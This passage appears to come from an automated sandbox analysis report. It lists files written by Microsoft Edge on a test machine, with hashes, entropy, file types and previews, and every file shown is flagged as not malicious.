SSDEEP:	6:HUzLzVFT+q2P923oH+TcwtfrK+IFUt8YUzLzoZZmw+YUzLzoNVkwO923oH+Tcwt5:+nvqv4Yeb23FUt8ZnU/+ZnU5LYeb3J
MD5:	ED3BFCBDCAB5E4C68D0C6F3257624519
SHA1:	976915F9D4CD266D1693EB4BF29F62F50E3E1B48
SHA-256:	92D960D77344AAB975AD8AA64BC227D7A8DF3192DF1F0B3F7DAFA712791001DF
SHA-512:	0FE177ED93310602071C66591C71B3ECB4079D7D864B48FB287A6A4F0E6B09211741CB9BD49E2CD555CDC970BE3E2B48A7DEF91A5F630B1F737E8B002937F03C
Malicious:	false
Preview:	2024/11/11-04:33:15.680 1c48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-04:33:15.681 1c48 Recovering log #3.2024/11/11-04:33:15.681 1c48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.206091313150845
Encrypted:	false
SSDEEP:	6:HUzLzVFT+q2P923oH+TcwtfrK+IFUt8YUzLzoZZmw+YUzLzoNVkwO923oH+Tcwt5:+nvqv4Yeb23FUt8ZnU/+ZnU5LYeb3J
MD5:	ED3BFCBDCAB5E4C68D0C6F3257624519
SHA1:	976915F9D4CD266D1693EB4BF29F62F50E3E1B48
SHA-256:	92D960D77344AAB975AD8AA64BC227D7A8DF3192DF1F0B3F7DAFA712791001DF
SHA-512:	0FE177ED93310602071C66591C71B3ECB4079D7D864B48FB287A6A4F0E6B09211741CB9BD49E2CD555CDC970BE3E2B48A7DEF91A5F630B1F737E8B002937F03C
Malicious:	false
Preview:	2024/11/11-04:33:15.680 1c48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-04:33:15.681 1c48 Recovering log #3.2024/11/11-04:33:15.681 1c48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.227923981087375
Encrypted:	false
SSDEEP:	6:HUzL9X13+q2P923oH+TcwtfrzAdIFUt8YUzL9B6Zmw+YUzL97VkwO923oH+TcwtS:+mv4Yeb9FUt8ZC/+Zhh5LYeb2J
MD5:	83E084EE89EFC908DE9E6BBD1A312E81
SHA1:	BC4E6DE50ABFC1D8B15045DFBE8D71DA03D8B5C2
SHA-256:	15C6C25681E8A59D18E93CFE9835F046A5C83F5874589AD59BB8CE7C0EBCFF03
SHA-512:	6ADF19DFCBBB9302D589AC675076B0476401C1ADDC09B160C41F8FD212F5DA7F6CF57A12618F56EA0E76BA4A52CB46CE6E856E6BF50829A76B7E0B183C9EE906
Malicious:	false
Preview:	2024/11/11-04:33:15.662 1c48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-04:33:15.665 1c48 Recovering log #3.2024/11/11-04:33:15.677 1c48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.227923981087375
Encrypted:	false
SSDEEP:	6:HUzL9X13+q2P923oH+TcwtfrzAdIFUt8YUzL9B6Zmw+YUzL97VkwO923oH+TcwtS:+mv4Yeb9FUt8ZC/+Zhh5LYeb2J
MD5:	83E084EE89EFC908DE9E6BBD1A312E81
SHA1:	BC4E6DE50ABFC1D8B15045DFBE8D71DA03D8B5C2
SHA-256:	15C6C25681E8A59D18E93CFE9835F046A5C83F5874589AD59BB8CE7C0EBCFF03
SHA-512:	6ADF19DFCBBB9302D589AC675076B0476401C1ADDC09B160C41F8FD212F5DA7F6CF57A12618F56EA0E76BA4A52CB46CE6E856E6BF50829A76B7E0B183C9EE906
Malicious:	false
Preview:	2024/11/11-04:33:15.662 1c48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-04:33:15.665 1c48 Recovering log #3.2024/11/11-04:33:15.677 1c48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF357c6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35bdd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38270.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46c72.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4c8bb.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
